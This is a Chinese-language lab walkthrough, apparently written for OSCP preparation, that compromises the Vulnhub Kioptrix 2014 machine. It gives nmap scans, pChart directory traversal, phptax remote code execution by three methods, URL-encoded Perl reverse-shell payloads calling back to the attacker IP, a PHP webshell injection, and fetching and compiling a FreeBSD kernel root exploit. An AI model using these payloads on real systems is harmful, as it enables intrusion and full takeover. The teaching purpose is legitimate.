OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

admin 2025年2月20日00:05:26评论8 views字数 2987阅读9分57秒阅读模式
 

一、靶机搭建

点击扫描虚拟机

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

然后扫描文件夹即可

二、信息收集

扫描ip

nmap扫描得到目标靶机ip

nmap -sn 192.168.108.0/24
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

攻击机:192.168.108.130
目标靶机:192.168.108.140

扫端口和服务信息

扫描开放端口信息

nmap -p 1-65535 192.168.108.140
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

可用信息

22/tcp   closed ssh            #ssh服务
80/tcp   open   http           #Web网站
8080/tcp open   http-proxy     #HTTP代理或备用Web端口

扫描服务信息

nmap -sV 192.168.108.140
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

可用信息

22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

指纹探测

执行以下命令

nmap 192.168.108.140 -p 22,80,8080 -sV -sC -O --version-all 
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

三、寻找攻击点并攻击

信息探测

访问8080端口,拒绝访问

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

访问80端口,在源码处发现该提示

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

访问该页面  http://192.168.108.140/pChart2.1.3/examples/index.php

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

根据提示应该与pChart2.1.3有关,查找该漏洞

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

参考文章:https://vk9-sec.com/exploiting-pchart-2-1-3-directory-traversal-xss/

漏洞利用

两个可用信息,逐一访问试试

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

可以正常访问

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

再看看配置文件,Apache HTTP 服务器的主配置文件安装为 /usr/local/etc/apache2x/httpd.conf,其中 x 表示版本号,可以看到需要访问8080端口,且浏览器代理为Mozilla/4.0才可以

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

访问8080端口,只有一个跳转链接,访问试试

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

随便点击看看,没有什么有用信息

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

根据phptax查找漏洞利用,发现一个利用脚本

https://github.com/NHPT/phptaxExploit
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

在kali下载下来利用

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

反弹shell

开启一个监听端口  nc -lvvp 4444,成功反弹

python3 phptax_exp.py -u http://192.168.108.140:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

其他方法

方法1

本靶机还可以利用其它方法连接,查看phptax漏洞,有两个远程命令执行漏洞

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

下载下来查看

searchsploit -m 21665.txt
searchsploit -m 25849.txt

先看25849.txt,有两处利用方式

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权
url/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]);?>
url/data/rce.php?cmd=id

执行完成之后访问

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

然后反弹shell

http://192.168.108.140:8080/phptax/data/rce.php?cmd=perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

kali监听即可

方法2

再看21665.txt,存在漏洞利用方式

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

解码看看

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

利用方式,同样kali监听即可

http://192.168.108.140:8080/phptax/drawimage.php?pfilez=xxx;perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';&pdf=make

四、提权

查看靶机信息,该用户为www,且系统内核为FreeBSD 9.0

uname -a:输出有关系统的详细信息,包括内核版本、主机名、操作系统类型和架构等
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

查看历史漏洞

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

该靶机没有wget命令

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

网上查找下载方式

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

下载exp脚本到本地

searchsploit FreeBSD 9.0 -m 26368.c
searchsploit FreeBSD 9.0 -m 28718.c
OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权
image-20250219173349106

开启web服务

python -m http.server 80

下载exp

fetch http://192.168.108.130/26368.c
gcc 26368.c -o 26368
chmod 77726368
./26368

下载成功并编译

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

添加权限并执行

OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

提权成功

end

原文始发于微信公众号(泷羽Sec-track):OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月20日00:05:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP备考-Vulnhub靶机-kioptix2014-三种方法getshell及提权https://cn-sec.com/archives/3762500.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息